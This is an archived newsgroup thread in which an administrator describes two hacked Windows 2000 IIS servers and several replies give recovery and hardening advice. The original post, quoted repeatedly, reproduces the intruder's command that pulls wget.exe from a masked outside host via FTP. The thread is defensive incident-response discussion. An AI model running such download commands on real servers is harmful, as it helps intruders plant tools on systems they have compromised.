Server Hacked - Assessment and Prevention

Archived from groups: microsoft.public.win2000.security (More info?)

I have 2 Windows 2000 Server Machines running IIS, which have been
compromised. I am trying to determine to what extent and more importantly
prevent this form reoccuring.

I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:

The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM

When I check the Server monitors, I found a command prompt open on the
screen, with the following:


C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login secceeded for SYSTEM@server1.domain.com
ftp>get wget.exe
ftp>

(Note: I have replaced the hacker's IP in the message above with x's)

I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.

How can I prevent this form reoccuring? How I can determine what, if any,
damage has been done?
5 answers Last reply
More about server hacked assessment prevention
  1. Archived from groups: microsoft.public.win2000.security (More info?)

    This machine was/is 100% patched.

    Also, the ftp.scr script simply contained the following line:
    get wget.exe

    Also, on the one machine, although FTP is enabled, Allow Anonymous is not.
    The other machine does not have FTP running at all.

    Reformatting is not an option right now.

    I've looked for the following:
    - Any weird programs installed - none
    - Any new directories - none
    - Any weird user accounts - none
    - Any weird ports connected - none

    I have also since changed the local administrator password.

    My assumption is that the system account was compromised. If it was, how
    can I prevent someone from regaining access using this account?
  2. Archived from groups: microsoft.public.win2000.security (More info?)

    > Reformatting is not an option right now.
    >

    > I've looked for the following:
    > - Any weird programs installed - none
    > - Any new directories - none
    > - Any weird user accounts - none
    > - Any weird ports connected - none

    New files?
    Renamed files?


    How can you be 100 % sure they did not rename a Trojan to a system file (
    note pad, word pad, defrag, maybe) that when executed will just reinstall
    the Trojan and open your computer up to him again?

    I would seriously reconsider this position.

    > My assumption is that the system account was compromised. If it was, how
    > can I prevent someone from regaining access using this account?


    By first making sure he did not hide something on your systems that will re
    activate, or reinstall itself on reboot or by you opening a program that
    "suddenly" doesn't work. Or so you think. It *may* be the renamed Trojan
    reinstalling itself quietly. To be 100 % sure you would have to format and
    restore from a known good backup.


    hth
    DDS W 2k MVP MCSE

    "john d" <johnd@discussions.microsoft.com> wrote in message
    news:E5DAF1BE-3CE0-4AD1-AE0E-0D541EA46987@microsoft.com...
    > This machine was/is 100% patched.
    >
    > Also, the ftp.scr script simply contained the following line:
    > get wget.exe
    >
    > Also, on the one machine, although FTP is enabled, Allow Anonymous is not.
    > The other machine does not have FTP running at all.
    >
    > Reformatting is not an option right now.
    >
    > I've looked for the following:
    > - Any weird programs installed - none
    > - Any new directories - none
    > - Any weird user accounts - none
    > - Any weird ports connected - none
    >
    > I have also since changed the local administrator password.
    >
    > My assumption is that the system account was compromised. If it was, how
    > can I prevent someone from regaining access using this account?
    >
    >
  3. Archived from groups: microsoft.public.win2000.security (More info?)

    As BM mentioned be sure to run IIS Lockdown/URLScan on your IIS servers and
    run the MBSA tool to check for missing patches and other vulnerabilities. It
    is also best practice to keep your IIS content on a partition separate from
    the system partition. Trojans are usually installed willfully by a computer
    user either through web browsing, email attachments, or installation from
    infected media so be sure to review your practices for such. If the trojan
    was installed by an admin a lot of damage could be done. A firewall that
    manages inbound and outbound access with a default block rule can minimize
    the impact of a trojan, particualry in acting as a backdoor.

    There are free tools from Sysinternals such as Process Explorer, Autoruns,
    TCPView, filemon, and RootkitRevealer that can help track down rouge
    processes/executeables. From what you describe your server has been
    compromised and the attacker had or has system or administrator access.
    Being such, a clean install is the only way to make sure the system is
    repaired. Todays root kits are very hard to detect and eliminate. But that
    is your call and maybe you will get lucky. The links below may help. ---
    Steve

    http://www.microsoft.com/technet/security/default.mspx
    http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml ---
    RootkitRevealer and link to SysInternals.
    http://www.microsoft.com/technet/security/tools/mbsahome.mspx --- MBSA
    http://www.securityfocus.com/infocus/1755 --- IIS Lockdown info.


    "john d" <johnd@discussions.microsoft.com> wrote in message
    news:2027AC13-EF0B-4F7F-A2A1-C6A7143D0007@microsoft.com...
    >I have 2 Windows 2000 Server Machines running IIS, which have been
    > compromised. I am trying to determine to what extent and more importantly
    > prevent this form reoccuring.
    >
    > I first noticed an issue because I received a virus alert from my Virus
    > scanning software on the servers indicating the following:
    >
    > The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
    > HackerDefender.sys Trojan. The file was successfully deleted. user NT
    > AUTHORITY\SYSTEM
    >
    > When I check the Server monitors, I found a command prompt open on the
    > screen, with the following:
    >
    >
    > C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
    > Anonymous login secceeded for SYSTEM@server1.domain.com
    > ftp>get wget.exe
    > ftp>
    >
    > (Note: I have replaced the hacker's IP in the message above with x's)
    >
    > I checked the security log and found that the intruder has cleared the
    > entries from that day. I have deleted ftp.scr from the server.
    >
    > How can I prevent this form reoccuring? How I can determine what, if any,
    > damage has been done?
  4. Archived from groups: microsoft.public.win2000.security (More info?)

    "john d" <johnd@discussions.microsoft.com> wrote in message
    news:2027AC13-EF0B-4F7F-A2A1-C6A7143D0007@microsoft.com...
    >I have 2 Windows 2000 Server Machines running IIS, which have been
    > compromised. I am trying to determine to what extent and more importantly
    > prevent this form reoccuring.
    >
    > I first noticed an issue because I received a virus alert from my Virus
    > scanning software on the servers indicating the following:
    >
    > The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
    > HackerDefender.sys Trojan. The file was successfully deleted. user NT
    > AUTHORITY\SYSTEM
    >
    > When I check the Server monitors, I found a command prompt open on the
    > screen, with the following:
    >
    >
    > C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
    > Anonymous login secceeded for SYSTEM@server1.domain.com
    > ftp>get wget.exe
    > ftp>
    >
    > (Note: I have replaced the hacker's IP in the message above with x's)
    >
    > I checked the security log and found that the intruder has cleared the
    > entries from that day. I have deleted ftp.scr from the server.
    >
    > How can I prevent this form reoccuring? How I can determine what, if any,
    > damage has been done?

    check your IIS logs. Assuming they've not been deleted. Patch you machine.
    Install IISLockdown. If you have any logging available, determine which
    account was logged on to. Change its password

    Report that IP address to abuse@ whio ever owns it

    I actaully found in my IIS logs a while back, an attempted exploit to
    remotely run some perl code from a website. It was on geocities . I emailed
    them about it, and they removed it in two days. Which I thought was pretty
    quick for a comapny of that site - though it'd have probalby run out of
    bandwidth anyway ;)
  5. Archived from groups: microsoft.public.win2000.security (More info?)

    If your server was really fully patched, then I assume either a sub-optimal
    configuration or a different app that wasn't patched was the problem.
    Usually these compromises are done via well known issues. I recommend
    these:

    http://securityadmin.info/faq.asp#ftpfolder
    http://securityadmin.info/faq.asp#hacked
    http://securityadmin.info/faq.asp#harden


    "john d" <johnd@discussions.microsoft.com> wrote in message
    news:2027AC13-EF0B-4F7F-A2A1-C6A7143D0007@microsoft.com...
    > I have 2 Windows 2000 Server Machines running IIS, which have been
    > compromised. I am trying to determine to what extent and more importantly
    > prevent this form reoccuring.
    >
    > I first noticed an issue because I received a virus alert from my Virus
    > scanning software on the servers indicating the following:
    >
    > The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
    > HackerDefender.sys Trojan. The file was successfully deleted. user NT
    > AUTHORITY\SYSTEM
    >
    > When I check the Server monitors, I found a command prompt open on the
    > screen, with the following:
    >
    >
    > C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
    > Anonymous login secceeded for SYSTEM@server1.domain.com
    > ftp>get wget.exe
    > ftp>
    >
    > (Note: I have replaced the hacker's IP in the message above with x's)
    >
    > I checked the security log and found that the intruder has cleared the
    > entries from that day. I have deleted ftp.scr from the server.
    >
    > How can I prevent this form reoccuring? How I can determine what, if any,
    > damage has been done?
Ask a new question

Read More

FTP Servers Windows